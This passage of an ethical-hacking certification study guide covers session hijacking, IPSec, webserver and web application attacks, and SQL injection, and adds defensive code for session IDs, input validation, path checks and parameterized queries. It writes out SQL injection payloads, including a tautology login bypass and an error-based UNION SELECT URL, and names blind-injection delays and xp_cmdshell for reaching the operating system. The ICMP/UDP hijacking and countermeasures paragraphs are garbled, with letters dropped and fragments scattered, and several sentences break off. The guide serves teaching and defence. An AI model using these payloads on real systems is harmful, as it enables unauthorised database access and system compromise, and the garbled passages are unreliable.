DoS testing involves finding out roughly what the minimum thresholds are for DoS attacks. Once the target is flooded with traffic, the findings about response time are compared to what is desired. Depending on the target and scope of the engagement, DoS pen testing may involve port flooding, email flooding, or website stress testing. Be cautious and be sure to have explicit permission to do this type of test.

Module 11 Session Hijacking

Study Guide Objectives: . What is Session Hijacking . Key Session Hijacking Techniques . Spoofing vs. Hijacking . Session Hijacking Process . Types of Session Hijacking . Session Hijacking in OSI Model . Application Level Session Hijacking . Network Level Session Hijacking . TCP/IP Hijacking . Session Hijacking Tools . Countermeasures . IPSec Architecture

What is Session Hijacking?
Session Hijacking is exploiting a valid computer session; this occurs when a hacker takes over a session of communication between two computers. This is used to get access to the system and to steal data. TCP/IP is the most commonly attacked protocol due to weaknesses in its design and because it is used in most communication.
Session Hijacking can be difficult to counter without encryption. Compromised sessions can allow for information and identity theft in a difficult to trace manner. Most computers use TCP/IP to communicate, which session hijacking targets. All of this makes Session Hijacking a very big threat.
Vulnerabilities that allow session hijacking include: not having lockouts for sessions, indefinite session times, insecure handling of session ids, and clear text transmission of data including the session identifier. Any of these vulnerabilities can lead to exploitation.

Key Session Hijacking Techniques
Brute forcing session ids occurs when there is not a mechanism to stop an attacker from trying random session ids until they are successful. This requires a limited field of possible session ids in order to succeed.
Stealing session ids can occur whenever they are transmitted during the session. Sniffing and interception are common methods. A referrer attack is one method. Using a link to another site the hacker entices the victim to click on the link, which causes the browser to send the referrer URL, which contains the session ID.
Calculating a session id can be easily accomplished if session ids have no random components.

Spoofing vs. Hijacking
Spoofing occurs when an attacker pretends to be a valid user. Hijacking occurs when an attacker takes over a valid user's session. Spoofing requires a hacker to be able to get credentials or other identifiers. Hijacking requires a hacker to be able to find an existing session, usually requiring sniffing.

Session Hijacking Process
1. Sniff
2. Monitor, in order to predict sequence numbers
3. Session Disconnect of valid user
4. Session ID prediction to take over the session
5. Command injection to communicate with target system

Session Hijacking in OSI Model
Network level Hijacking involves intercepting packets in a TCP or UDP session. This requires access to network traffic, which can be accomplished remotely by use of a Trojan or by use of packet sniffers on a network or device.
Application level hijacking gains control of an HTTP user session by sniffing the session ID cookie or packet used to keep track of a user's session on the website.

Application Level Session Hijacking
There are multiple methods for gaining control of a session at the application level.
1. Session Sniffing
2. Predictable Session Token
3. Man in the middle attacks
4. Client side attacks
Session Sniffing
Using a sniffer an attacker can capture a valid session token and present it to the webserver. If there is not a mechanism for checking the validity of the token, it can be used by the attacker to gain access to the session.
Predicting Session Tokens
When webservers use a predictable method for generating session IDs it is then possible to guess what session IDs will be and use that guess to access the server. One example of this is a webserver session that uses a constant bit of data and adds the date and time to that constant to create a unique session ID.
Man-in-the-Middle Attacks
A man in the middle attack occurs when the hacker is able to place themselves in communication between a client and server. When the client and the server are not able to confirm each other's identities, or if they can be fooled, a man in the middle attack can occur. The attacker takes the communication from the client, and then passes it on to the server. The attacker can modify or insert data after reading what the packet contains. This can occur in HTTP transactions by manipulating the browser or by tricking a user into using the attacker's machine as a proxy.
Client-side Attacks
Client-side attacks use methods of getting the session ID stored in a cookie to compromise a session. If the session ID is stored in a plaintext cookie it could be used to give the attacker access to the client session. A Cross-site Scripting attack uses XSS to make the client send or show cookie information that can then be used to hijack the session. The same type of information can be gained using malicious javascript or by use of a Trojan. Once the attacker has the Session ID information it is formatted into a javascript type request to enter the session through a web browser.
Session Fixation is a technique where an attacker with a legitimate Session ID issued by a server tricks a victim into using that session ID to authenticate. This removes the attacker's need to identify the session used, because they already had that information. There are three common methods used to pass this session information onto the server from the user: by the token being in the URL argument, hiding it in a hidden form field on the website, or by placing it in a cookie which is installed into the browser.

Network Level Session Hijacking
Network level session hijacking takes advantage of how the network protocol exchanges information to gain a foothold at this lower level, giving an attacker an advantage in compromising higher level communication. When the three-way handshake is used the sequence numbers used by the client and server are exchanged to give a sense of flow and order to the communication. These sequence numbers are the target of a network level session hijack attempt. Sequence number Prediction attacks use this knowledge of the handshake to send a connection attempt to a server with the correct sequence number along with a forged source IP address, which can allow a Denial of service to the true IP or close the connection with a FIN bit.
TCP/IP Hijacking
TCP/IP hijacking is a technique using spoofed network packets to take over a session between client and target. This requires that you are on the same network as the target system, and able to spoof the IP address of the client. First, an attacker sniffs traffic to determine the sequence numbers in the communication. Then the hacker spoofs the IP and sends a packet with the next sequence number. The host accepts that packet, increments the sequence number and sends an ACK to the client. This packet will be considered out of sequence, causing the client to disregard this packet as valid, which allows the attacker to step in and continue the communication as if he were the victim.
Source Routed packets can be used by an attacker to specify what path the packets of a communication should take. The attacker directs the packets to pass through a specific device for sniffing.
RST Hijacking refers to the technique of sending a forged RST packet to a victim causing them to end the session. Once this session is closed the victim may attempt to reset the connection with the hacker, or the hacker may create a denial of service by repeating the process.
Blind Hijacking occurs when a hacker can inject data into a communication but is not able to route the communication to sniff the results.
Man-in-the-Middle Attack using Packet Sniffers
With a packet sniffer installed on a device, any data that passes through that device can be used in a Man in the Middle attack. Using an Address Resolution Protocol Spoof an attacker can pose as another device that a client uses to connect to a host.
Using forged Internet Control me ssage Protocol pac ets can also be used to direct client to server traffic through a hac er s pac et snif An example of doing this would be a hac er with a laptop in a coffee shop posing as a Wireless Acces s Point. Clients connect un now ingly to the hac er s Access Point and the hac er sniffs the traffic that then to the internet. UDP Hijac ing UDP does not deal with sequence numbers as TCP does, however if the attac er can a response bac to a client after a request before the server does an attac er can ta e ove communication. send r the evice can sion


s in


goes Session Hijac ing Tools Burp Suite is a proxy that allow for the inspection, m s odification, and inspecti on of traffic. This is the tool commonly used in our practice. Firesheep is the now defunct firefox addon that allowed anyone who tried it out to hijac sessions of popular sites such as Faceboo and Twitter. Read r more information Countermeasures All session hijac ing relies on plaintext communication. Encryption can be used to eep individual pieces of information such as user names, passwords, and session ids unreadable. Session IDs should be randomly generated on request. This handles the vulnerabil ity of a person being tric ed into using a specific, attac er generated session. Sessions should also absolute time outs so that they cannot be used after a valid user is disconnected. Networ traffic should not allow source routing of pac ets. Using Encrypted and secure protocols also thwarts session hijac ing.
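The countermeasures above (random session IDs, a fresh ID at login to defeat fixation, and an absolute timeout) beside the predictable constant-plus-timestamp scheme from the Predicting Session Tokens paragraph, as an added illustration that is not code from the study guide. The in-memory SessionStore, the injectable clock and the eight-hour timeout value are assumptions made for the example.

```python
import hmac
import secrets
import time

SESSION_ID_BYTES = 32                    # 256 bits from the OS CSPRNG
ABSOLUTE_TIMEOUT_SECONDS = 8 * 60 * 60   # assumed policy value for this example


def predictable_session_id(constant: str, now: float) -> str:
    """The weak scheme the text describes: a fixed string with the date and
    time appended. Knowing the constant and roughly when the victim logged in
    is enough to enumerate candidate IDs."""
    return f"{constant}{int(now)}"


def random_session_id() -> str:
    """Unpredictable ID: 32 random bytes, URL-safe base64 (43 characters)."""
    return secrets.token_urlsafe(SESSION_ID_BYTES)


class SessionStore:
    """Minimal in-memory, server-side session table (assumed for the example).
    `clock` is injectable so the timeout can be exercised without waiting."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # session_id -> {"user": str | None, "created": float}

    def anonymous(self) -> str:
        """Pre-login session, e.g. a shopping cart. This is the kind of
        legitimately issued ID a fixation attack plants on the victim."""
        sid = random_session_id()
        self._sessions[sid] = {"user": None, "created": self._clock()}
        return sid

    def login(self, presented_id, user: str) -> str:
        """Authenticate: discard whatever ID the client presented and issue a
        fresh random one. Whoever planted `presented_id` is left holding a
        dead identifier, which is what defeats session fixation."""
        self._sessions.pop(presented_id, None)
        new_id = random_session_id()
        self._sessions[new_id] = {"user": user, "created": self._clock()}
        return new_id

    def lookup(self, session_id):
        """Return the logged-in user for a valid session, else None. The
        session is rejected once ABSOLUTE_TIMEOUT_SECONDS have passed since
        creation, regardless of activity, so a sniffed or guessed ID stops
        working when the window closes."""
        if not isinstance(session_id, str) or not session_id.isascii():
            return None   # compare_digest needs ASCII str; reject anything else
        record = None
        for sid, rec in self._sessions.items():
            # constant-time compare so the check does not leak how many
            # leading characters of a guessed ID were right
            if hmac.compare_digest(sid, session_id):
                record = rec
                break
        if record is None:
            return None
        if self._clock() - record["created"] > ABSOLUTE_TIMEOUT_SECONDS:
            del self._sessions[session_id]   # equal strings, so the key exists
            return None
        return record["user"]
```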


IPSec
IPSEC is a set of protocols developed to secure communication at the network layer. It is often used in Virtual Private Networks. IPSEC provides:
1. Network-level Peer Authentication
2. Data Integrity
3. Data Confidentiality
4. Replay Protection
5. Data Origin Authentication

IPSEC uses two modes: Transport and Tunnel. Transport mode authenticates the communication between computers. This mode does have the ability to encrypt the actual data payload of the packets and does work with Network Address Translation (NAT). Tunnel mode encapsulates the whole packet, not just the data payload. The entire packet is encrypted and then encapsulated. Tunnel mode supports NAT traversal.

IPSEC uses Authentication Headers to ensure that the data is what it says it is (integrity) and came from where it says it came from (origin authentication). This also provides a countermeasure to replay attacks. The Encapsulating Security Payload is used to keep the information in a packet confidential. IPSEC implementations may include AH, ESP, or both to provide for data security.

SA, or Security Association, is the third component of IPSEC. The IPSec architecture uses the concept of a security association as the basis for building security functions into IP. A security association is simply the bundle of algorithms and parameters (such as keys) that is being used to encrypt and authenticate a particular flow in one direction. Therefore, in normal bi-directional traffic, the flows are secured by a pair of security associations.



Module 12 Hacking Webservers Study Guide
Objectives:
. Webserver Threats
. Web Application Attacks
. Webserver Attack Tools
. Countermeasures
. Defending Against Webserver Attacks
. What is Patch Management?
. Patch Management Tools
. Webserver Security Tools
. Webserver Pen Testing

Webserver Threats
Webservers exist to provide information or resources to the public. This creates a partially open door for malicious hackers; they can then concentrate on forcing it open the rest of the way. Webservers can be vulnerable to attacks that target the website or web application itself, or to attacks that allow a foothold into a target's environment.

Web Application Attacks
Directory Traversal Attacks exploit a vulnerability in how the server communicates with the client to tell it to change the directory for the client. This enables a hacker to view files outside the web directory and execute commands. This is covered in detail in the next module.

HTTP Response Splitting Attacks occur when a malicious hacker inserts data into a request, like an HTTP request, that causes the server to split the response, allowing the hacker to control some of the return. The vulnerability is the unvalidated input allowed by the web application on the server. Proper URL encoding and disallowing codes for a carriage return will prevent this attack.

HTTP Response Hijacking occurs when a hacker can use the technique above to send a response to a victim from the vulnerable server and then use the information the victim was transmitting to receive the response of that request.

Web Cache Poisoning puts a malicious website into a web server's cache as a legitimate site. This occurs when a DNS server is vulnerable to accepting cache information from untrusted sources. The attacker issues a command to flush the caches and then sends a request that creates the malicious entry.

Other webserver attacks target the encryption between the client and server, or the password used to authenticate, when these are vulnerable.

Webserver Attack Tools
Metasploit is a penetration testing toolkit. This toolkit allows ethical hackers to test systems, but can be used by malicious hackers to run exploits against webservers. Metasploit uses known vulnerabilities to create payloads, files that contain the code needed to successfully exploit these vulnerabilities.



Countermeasures
Countermeasures for webserver attacks can be divided into updates, protocols, accounts, and file structure.

Updates and patches for the server OS of the webserver should be applied in a regular fashion, after testing in a non-production environment.

Protocols used by the webserver should be limited to only the ones required for operation. Insecure protocols such as telnet, smtp, and ftp should not be in use on a webserver. Remote access should be encrypted or disabled.

All default accounts should be disabled. All accounts that are used by the webserver should have as little privilege as possible and require strong passwords. These accounts should have logon auditing and have alerts for when they fail, to combat dictionary and brute force password attacks.

Directory structure listing should be disabled. Any non-web files such as logs and backups should be removed from the server.

Defending Against Webserver Attacks
Defending against web server attacks requires a defense in depth approach to ensure that all attack vectors have been guarded against. The more ports that are open and applications that are running on a web server, the more opportunities there are for hacking. Every service and connection should be run with a least privilege account. The server itself needs to be hardened and accessed physically only when necessary. It should not be connected to the internet until after it has been hardened. If web applications are running that require a database backend, that database should be on a separate server. Audit logs should also be kept on a separate server.

What is Patch Management?
Patch Management is the process of ensuring that all systems are using the appropriate and up to date software for the hardware or software asset. Developing a good patch management system is critical to keeping systems secure. A good patch management program will follow these steps:
1. Accurately inventory all hardware and software assets
2. Determine an acceptable update window based on criticality.
3. Test all updates adequately prior to placing them in the production environment
4. Install patches within the update window stated in step 2.
5. Document any exceptions to the program.

Be sure to test updates in a non-production environment. It is important to ensure that you have a window of time for updating critical systems that will not be too soon after the patch is released. Patches might break critical software. Being sure that all patches are applied on a regular basis to all systems is critical.

Patch Management Tools
The Microsoft Baseline Security Analyzer is an example of a free patch assessment tool that can check for known vulnerabilities caused by missing patches.

Webserver Security Tools
SAINT, the System Administrator's Integrated Network Tool, is a popular software package that can be used to assess and test webserver security. It is capable of fully automated scans and can be used for specific exploitation.

HackAlert is a cloud based service for monitoring and vulnerability assessment. Software as a Service (SaaS) can also be tied into Web Application Firewalls. This re

Webserver Pen Testing
Penetration testing webservers encompasses most of the entire pen testing spectrum. Web servers require footprinting, scanning, enumeration of user accounts and ports, website vulnerability assessment, OS assessment, and specific attack testing. All of these steps must be carried out and documented to perform a full penetration test. After the vulnerabilities are known, exploits may be attempted to assess the extent of the vulnerability and determine what information can be compromised.

Module 13 Hacking Web Applications Study Guide
Objectives:
. Introduction to Web Applications
. Web Application Components
. How Web Applications Work
. Web Application Architecture
. Unvalidated Input
. Parameter/Form Tampering
. Injection Flaws
. Hidden Field Manipulation Attack
. Cross-Site Scripting (XSS) Attacks
. Web Services Attack
. Hacking Methodology
. Web Application Hacking Tools
. How to Defend Against Web Application Attacks
. Web Application Security Tools
. Web Application Firewalls
. Web Application Pen Testing

Introduction to Web Applications
Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.

Web Application Components
Web attack vectors are paths or means to attack and gain access to computer or network resources. For example: parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross site scripting (XSS).

Unvalidated Input
When an e-commerce web site has been compromised, there is a good chance the attacker used unvalidated input as an element of the attack. If information submitted via a web site is not validated before it's processed, an attacker can obtain sensitive information or attack the site. Web applications use input from HTTP requests (and occasionally files) to determine how to respond. Attackers can tamper with any part of an HTTP request, including the URL, query string, headers, cookies, form fields, and hidden fields, to try to bypass the site's security mechanisms. Common names for common input tampering attacks include: forced browsing, command insertion, cross-site scripting (XSS), buffer overflows, format string attacks, SQL injection, cookie poisoning, and hidden field manipulation.

Parameters should be validated against a positive specification that defines:
. Data type (string, integer, real, etc.)
. Allowed character set
. Minimum and maximum length
. Whether null is allowed
. Whether the parameter is required or not
. Whether duplicates are allowed
. Numeric range
. Specific legal values (enumeration)
. Specific patterns (regular expressions)
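A validator that implements every rule in the positive specification above, added here as an illustration and not code from the study guide. ParamSpec, validate_param and the sample specs (a quantity field, a username, a country code) are constructed for the example; the input arrives as the raw strings a request carries, and anything the spec does not explicitly allow is rejected.

```python
import re
from dataclasses import dataclass
from typing import Optional, Sequence


@dataclass(frozen=True)
class ParamSpec:
    """One parameter's positive specification; each field is one rule from the list."""
    name: str
    data_type: type = str                  # str, int or float
    allowed_chars: Optional[str] = None    # character set; None = any character
    min_len: int = 0                       # length bounds on the raw string
    max_len: int = 256
    allow_null: bool = False               # may the client send an explicit null?
    required: bool = True                  # must the parameter be present?
    allow_duplicates: bool = False         # may it appear more than once?
    num_range: Optional[tuple] = None      # (low, high) inclusive, numeric types only
    legal_values: Optional[Sequence] = None  # enumeration of permitted values
    pattern: Optional[str] = None          # regular expression, must match the whole value


class ValidationError(ValueError):
    """Raised with the parameter name and the rule that failed."""


def validate_param(spec: ParamSpec, values: Sequence[Optional[str]]):
    """values: every occurrence of the parameter in the request (query string,
    form body) as raw strings, None standing for an explicit null. Returns the
    converted value (or list of values when duplicates are allowed), or raises."""
    if not values:
        if spec.required:
            raise ValidationError(f"{spec.name}: required parameter missing")
        return None
    if len(values) > 1 and not spec.allow_duplicates:
        raise ValidationError(f"{spec.name}: duplicate parameter")
    out = []
    for raw in values:
        if raw is None:
            if not spec.allow_null:
                raise ValidationError(f"{spec.name}: null not allowed")
            out.append(None)
            continue
        if not (spec.min_len <= len(raw) <= spec.max_len):
            raise ValidationError(f"{spec.name}: length {len(raw)} outside "
                                  f"[{spec.min_len}, {spec.max_len}]")
        if spec.allowed_chars is not None and any(c not in spec.allowed_chars for c in raw):
            raise ValidationError(f"{spec.name}: character outside allowed set")
        if spec.pattern is not None and re.fullmatch(spec.pattern, raw) is None:
            raise ValidationError(f"{spec.name}: does not match required pattern")
        try:
            value = spec.data_type(raw)          # e.g. int("25") -> 25
        except ValueError:
            raise ValidationError(f"{spec.name}: not a valid {spec.data_type.__name__}") from None
        if spec.num_range is not None:
            low, high = spec.num_range
            if not (low <= value <= high):
                raise ValidationError(f"{spec.name}: {value} outside range [{low}, {high}]")
        if spec.legal_values is not None and value not in spec.legal_values:
            raise ValidationError(f"{spec.name}: not one of the legal values")
        out.append(value)
    return out if spec.allow_duplicates else out[0]


def rejects(spec: ParamSpec, values: Sequence[Optional[str]]) -> bool:
    """True when the value set fails the spec; handy for exercising the rules."""
    try:
        validate_param(spec, values)
    except ValidationError:
        return True
    return False
```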

Parameter/Form Tampering
Parameter tampering occurs when the client side of the web application has sensitive information which is then manipulated by an attacker. When the client sends the parameters of the exchange to the server, those parameters can be modified by using a proxy. This type of attack also occurs when hidden fields are used by websites for e-commerce transactions. The price or quantity field is transmitted using the client, which makes the field susceptible to being altered by an attacker. This is called Hidden Field Manipulation.


Directory Traversal
The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking.
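The containment check a file-serving handler needs against the ../ attack described above, added here as an illustration and not the study guide's code. It resolves the requested name to a real path and confirms the result is still inside the document root, so dot-dot sequences, percent-encoded variants and symlinks pointing outside are all refused; the document root and request paths are constructed sample values.

```python
import os
import urllib.parse


class TraversalError(PermissionError):
    """Raised when a requested path would resolve outside the document root."""


def resolve_under_root(doc_root: str, requested: str) -> str:
    """Return the real filesystem path for `requested` (a URL path, possibly
    percent-encoded) or raise TraversalError if it would leave `doc_root`."""
    # Decode exactly once. The decoded value is both checked and used, so a
    # doubly-encoded "%252e%252e" cannot pass the check as harmless text and
    # be decoded again into ".." later.
    name = urllib.parse.unquote(requested)
    # A URL path is always relative to the document root: strip leading
    # separators so os.path.join does not treat it as an absolute path.
    name = name.lstrip("/\\")
    root = os.path.realpath(doc_root)
    # realpath collapses "." and ".." and follows symlinks, so a link that
    # points outside the root is caught as well as a plain "../" sequence.
    candidate = os.path.realpath(os.path.join(root, name))
    # commonpath compares whole path components; a bare startswith(root)
    # would wrongly accept "/var/www-private" as being under "/var/www".
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalError(f"refused {requested!r}: resolves to {candidate}")
    return candidate


def is_under_root(doc_root: str, requested: str) -> bool:
    """Boolean form of the same check, convenient for request filters."""
    try:
        resolve_under_root(doc_root, requested)
        return True
    except TraversalError:
        return False
```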

Security Misconfigurations
Web server and application server configurations play a key role in the security of a web application. These servers are responsible for serving content and invoking applications that generate content. In addition, many application servers provide a number of services that web applications can use, including data storage, directory services, mail, messaging, and more. Failure to manage the proper configuration of your servers can lead to a wide variety of security problems.

Frequently, the web development group is separate from the group operating the site. In fact, there is often a wide gap between those who write the application and those responsible for the operations environment. Web application security concerns often span this gap and require members from both sides of the project to properly ensure the security of a site's application.

There are a wide variety of server configuration problems that can plague the security of a site. These include:
. Unpatched security flaws in the server software
. Server software flaws or misconfigurations that permit directory listing and directory traversal attacks
. Unnecessary default, backup, or sample files, including scripts, applications, configuration files, and web pages
. Improper file and directory permissions
. Unnecessary services enabled, including content management and remote administration
. Default accounts with their default passwords
. Administrative or debugging functions that are enabled or accessible
. Overly informative error messages (more details in the error handling section)
. Misconfigured SSL certificates and encryption settings
. Use of self-signed certificates to achieve authentication and man-in-the-middle protection
. Use of default certificates
. Improper authentication with external systems

Some of these problems can be detected with readily available security scanning tools. Once detected, these problems can be easily exploited and result in total compromise of a website. Successful attacks can also result in the compromise of backend systems including databases and corporate networks. Having secure software and a secure configuration are both required in order to have a secure site.

Injection Attacks
Injection problems encompass a wide variety of issues, all mitigated in very different ways. For this reason, the most effective way to discuss these flaws is to note the distinct features which classify them as injection flaws. The most important issue to note is that all injection problems share one thing in common: they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instances of this category of flaw are SQL injection and format string vulnerabilities.

SQL Injection
SQL injection takes advantage of the syntax of SQL to inject commands that can read or modify a database, or compromise the meaning of the original query. For example, consider a web page that has two fields to allow users to enter a user name and a password. The code behind the page will generate a SQL query to check the password against the list of user names:

SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("password' OR '1'='1") in the Password field, then the resulting query will look like this:

SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.
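The login query above built both ways, as an added illustration that is not code from the study guide: the string-concatenated form that behaves exactly as the text describes, beside the parameterized form that keeps the same input as plain characters. An in-memory SQLite table with two constructed rows stands in for UserList, and the injected Password value is the one quoted in the text.

```python
import sqlite3

# Constructed sample rows standing in for the UserList table above. Real
# systems store password hashes, not plaintext; the guide's query is kept as
# written so the injection behaves exactly as described.
SAMPLE_USERS = [("alice", "correct horse"), ("bob", "hunter2")]
# The Password field value quoted in the text.
INJECTED_PASSWORD = "password' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """Create an in-memory UserList holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO UserList VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_concatenated(conn, username: str, password: str) -> list:
    """Vulnerable form: the user's input is spliced into the SQL text, so a
    single quote in the input closes the literal and the remainder is parsed
    as SQL. Returns the (sorted) usernames the query matched."""
    sql = ("SELECT UserList.Username FROM UserList "
           "WHERE UserList.Username = '" + username + "' "
           "AND UserList.Password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_parameterized(conn, username: str, password: str) -> list:
    """Hardened form: the statement text is fixed and the values travel
    separately as bound parameters, so quotes and OR are just characters
    inside a string compared against the Password column."""
    sql = ("SELECT UserList.Username FROM UserList "
           "WHERE UserList.Username = ? AND UserList.Password = ?")
    return sorted(row[0] for row in conn.execute(sql, (username, password)))
```

With the injected value, the concatenated query matches every row (AND binds tighter than OR, so the tautology applies to the whole table) while the parameterized one matches none.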

Cross-Site Scripting (XSS) Attacks
Cross-site scripting (XSS) is a security exploit in which the attacker inserts malicious coding into a link that appears to be from a trustworthy source. When someone clicks on the link, the embedded programming is submitted as part of the client's web request and can execute on the user's computer, typically allowing the attacker to steal information.

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.

Stored XSS Attacks
Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.

Reflected XSS Attacks
Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable server, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server.




Web Services Attack
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model.

Web services typically present a public functional interface, capable of being called in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases.

Hackers are rapidly learning how to effectively compromise Web Services technologies to carry out their attacks or gain valuable footprinting information. These are the tools our practice uses.
. Burp Suite
. W3af
. OWASP

How to Defend Against Web Application Attacks
Make sure you are familiar with these concepts.
. Validate and sanitize input
. Safely handle different encoding schemes
. Low privilege accounts for DB connection
. Custom error messages so there isn't a mess of information available to average users
. Validate redirects and forwards, or avoid using them at all
. No session data in GET and POST
. Secure cookies and do not store sensitive info in plain text
. Least amount of information about services on a server as possible

Web Application Firewalls
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.


Web Application Pen Testing
Web application penetration testing refers to a set of services used to detect various security issues with web applications and identify vulnerabilities and risks, including:
. Known vulnerabilities in COTS (Commercial Off The Shelf) applications
. Technical vulnerabilities: URL manipulation, SQL injection, cross-site scripting, back-end authentication, password in memory, session hijacking, buffer overflow, web server configuration, credential management, Clickjacking, etc.
. Business logic errors: day-to-day threat analysis, unauthorized logins, personal information modification, pricelist modification, unauthorized funds transfer, breach of customer trust, etc.

OWASP, the Open Web Application Security Project, an open source web application security documentation project, has produced documents such as the OWASP Guide and the widely adopted OWASP Top 10 awareness document.

Module 14 SQL Injection Study Guide
Objectives:
. Introduction to SQL Injection
. Types of SQL Injection
. SQL Injection Methodology
. Common SQL Injection
. Advanced SQL Injection
. SQL Injection Tools
. Signature Evasion Techniques
. Defending Against SQL Injection

Introduction to SQL Injection
SQL injection is the most common enemy. The vulnerability in SQL injection is that data is not validated before it is sent to the database. SQL injections occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. This allows for a significant bypassing of security measures. This is a specific version of an injection attack identified in module 13. A successful SQL injection can lead to information theft and tampering, as well as possible Denial of Service attacks.

Critical Concepts

Server Side Technologies
ASP.Net and relational databases such as SQL Server, Oracle, IBM DB2 and MySQL are all server side technologies that are susceptible to SQL injection attacks. It is not a matter of specific vulnerabilities in the software but the way they are implemented to create dynamic content without data validation.

HTTP Post Request
When the HTTP Post method is used to send data to the server, this string is visible as the HTTP address in vulnerable implementations. This data is used to create the SQL query, and when it is changed the SQL injection occurs.

SQL commands and logic
A common login method is to match a username and password. In a legitimate interaction these two bits of data are looked up in a table; if the user's input data matches data found in the table the user is considered authenticated. The authentication occurs because, logically, the matching data creates a TRUE condition. In a vulnerable implementation, entering another TRUE condition such as 1=1 and then a comment sequence to comment out the rest of the SQL request will also allow for an authentication. Using this logic a hacker can use true conditions to then edit the table, add records, display records, or just delete the table.


Informative Error Messages
Error messages are used to correct issues with a database query. When these errors are displayed to a hacker they can be used to get important information such as table names, user names, passwords, and even more sensitive information. One method is to use the UNION command to combine two types of data that cannot be combined, such as a string of characters and an integer. This will produce an error that tells you what data could not be combined. For example:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching pattern '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login". Using these types of commands and patience, almost any information can be uncovered.

Types of SQL Injection Attack

Stored Procedure
Using stored procedures does not necessarily prevent SQL injection. The important thing to do is use parameters with stored procedures. If you do not use parameters, your stored procedures can be susceptible to SQL injection if they use unfiltered input.

Union Query
Using UNION to return the information desired.

Tautology
A tautology is a statement that is always true, such as 1=1. Injecting these statements along with an OR logically creates a statement that is true, making the SQL injection work.

End of Line Comment
Using end-of-line comment characters, or other commenting characters, to nullify legitimate code suffixed onto the attack code.

Blind SQL Injection
When a target does not provide informative error messages, it may still be susceptible to attack. Hacking when receiving a generic or custom error message requires Blind SQL injection techniques. This requires more time and patience to uncover information. Injecting a request with the WAITFOR DELAY command and a 10 second sleep will tell a hacker if their command was accepted, if the page then delays in its processing. BENCHMARK is another such command. Blind SQL injection works by asking a series of yes or no questions and using that information to construct an understanding of the target.

SQL Injection Methodology
1. Gather information
2. Detect vulnerabilities
   a. This is done by injecting test queries such as
3. Perform error based, union based, or blind SQL injections depending on the vulnerabilities and level of error reporting found.
4. Extract desired information
5. Interact with the OS
   a. Compromise the machine
   b. Execute commands or access system files
6. Move on to compromise the network

Common SQL Injection Hacking
Use SQL injection hacking to grab passwords or hashes, create database accounts in a system, transfer an entire database to your machine, interact with the file system or operating system, or perform network reconnaissance.

Advanced SQL Injection Hacking

Advanced Enumeration
Recognize that different databases require different query types. The CEH test does not require you to know which commands interact with each database type.

Advanced Database Interaction
Using more specific SQL commands it is possible to grab stored password hashes to be broken offline. Another common interaction is to transfer the entire database to the attacker's machine using standard port 80 traffic. Depending on the level of permissions of the database user it is also possible to interact with the operating system. Examples of this include the LOAD_FILE command and xp_cmdshell, which allow a file to be loaded to the database and viewed, or interacting with a command line through the database.

SQL Injection Tools
SQLsmack
SQLninja
Absinthe

Signature Evasion Techniques
